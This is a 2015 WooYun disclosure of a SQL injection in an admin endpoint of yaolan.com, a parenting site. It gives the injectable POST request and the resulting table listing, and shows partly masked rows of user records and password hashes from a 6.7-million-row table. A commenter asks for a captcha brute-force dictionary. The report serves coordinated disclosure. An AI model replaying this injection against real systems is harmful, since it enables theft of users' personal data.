摇篮网某站点MySQL注射(涉及大量用户数据)

编号118883
Urlhttp://www.wooyun.org/bug.php?action=view&id=118883
漏洞状态厂商已经确认
漏洞标题摇篮网某站点MySQL注射(涉及大量用户数据)
漏洞类型SQL注射漏洞
厂商摇篮网
白帽子lijiejie
提交日期2015-06-07 21:26:00
公开日期2015-07-23 17:22:00
修复时间(not set)
确认时间2015-06-08 00:00:00
Confirm Spend1
漏洞标签
关注数0
收藏数0
白帽评级
白帽自评rank15
厂商评级
厂商评rank20
漏洞简介
摇篮网某站点MySQL注射(674万用户数据可拖库),库中包含用户密码,邮箱,手机号,QQ等资料
漏洞细节

注射点在后台http://jifen.yaolan.com/admin.php?r=site/login:

POST /admin.php?r=site/GetUserCoin HTTP/1.1
Content-Length: 141
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://jifen.yaolan.com
Cookie: PHPSESSID=eqffbvsjk3ardoggo834p3g3v5
Host: jifen.yaolan.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*
userId=*

POC

current user:    '[email protected]%'
current database: 'user_yaolan_com'
Database: user_yaolan_com
[31 tables]
+-------------------------+
| BoroughList |
| ChildInfo |
| ChildInterestDetailList |
| ChildInterestInfo |
| ChildInterestList |
| CityList |
| CoinInfo |
| CountryList |
| EducationList |
| GeekList |
| GradeList |
| IncomeList |
| LoginInfo |
| MarkInfo |
| NoDefaultChildInfo |
| ProfessionList |
| ProvinceList |
| TradeList |
| UserBaseInfo |
| UserExtInfo |
| UserGeekDetail |
| UserInterestDetailList |
| UserInterestInfo |
| UserInterestList |
| UserSignature |
| UserSource |
| UserVerifyDetail |
| VerifyList |
| iur_child_birth_based |
| sysdiagrams |
| word_filter_reg |
+-------------------------+
Database: user_yaolan_com
+-----------+---------+
| Table | Entries |
+-----------+---------+
| LoginInfo | 6741020 |
+-----------+---------+


LoginInfo表中包括用户密码, UserBaseInfo和UserExtInfo两个表则包含用户的个人资料,邮箱手机号,QQ号码,地址等:
尝试取100万到1000010这10条记录,如下:

mask 区域
*****Bind,ModifiedDate,MSN,NickNameLastModifiedTime,PostalAd*****
*****ot;,"NULL","NULL","NULL","163002","0&qu*****
*****0","NULL","NULL","NULL","NULL","*****
*****","NULL","NULL","NULL","317000",&quot*****
*****0","NULL","NULL","NULL","NULL","*****
*****ot;,"NULL","NULL","NULL","100091","0&q*****
*****0","NULL","NULL","NULL","NULL","0*****
*****00","NULL","NULL","NULL","510650",&quot*****
*****00","NULL","NULL","NULL","NULL","*****
*****00","NULL","NULL","NULL","NULL",&quot*****
*****;,"NULL","NULL","NULL","466200","0&quot*****
**********
*****d,RegDate,RegIp,ResetP*****
*****6c16b2","2003-10-10 14:00:49",&qu*****
*****f81dc7","2003-10-16 10:34:23",&qu*****
*****9efbae","2005-03-23 16:50:43",&qu*****
*****421f50","2003-11-11 15:32:21",&qu*****
*****3f09b9","2003-10-31 18:34:07",&qu*****
*****2f806b","2004-02-02 16:48:05",&qu*****
*****54db06","2003-10-27 08:31:31",&qu*****
*****06c118","2004-06-07 11:01:28",&qu*****
*****4a1a6e","2004-04-27 14:12:17",&qu*****
*****cod*****


修复方案

参数过滤

状态信息 2015-06-07: 细节已通知厂商并且等待厂商处理中
2015-06-08: 厂商已经确认,细节仅向厂商公开
2015-06-18: 细节向核心白帽子及相关领域专家公开
2015-06-28: 细节向普通白帽子公开
2015-07-08: 细节向实习白帽子公开
2015-07-23: 细节向公众公开
厂商回复漏洞确认,正在修复。感谢乌云白帽子提醒。
回应信息危害等级:高漏洞Rank:20 确认时间:2015-06-08 17:21
Showing 1-3 of 3 items.
评论内容评论人点赞数评论时间

@天地不仁 以万物为刍狗 求个验证码爆破字典

牛 小 帅02015-06-08 10:21:00

@天地不仁 以万物为刍狗 我还以为你们是一起的@lijiejie

茜茜公主02015-06-07 21:57:00

卧槽 为什么我的没审核 我的在前面啊 这有重复没 @疯狗 @浩天 http://www.wooyun.org/bugs/wooyun-2015-0118715/trace/77bfdaa5d372b23bb1994d107aa4a37b

天地不仁 以万物为刍狗02015-06-07 21:34:00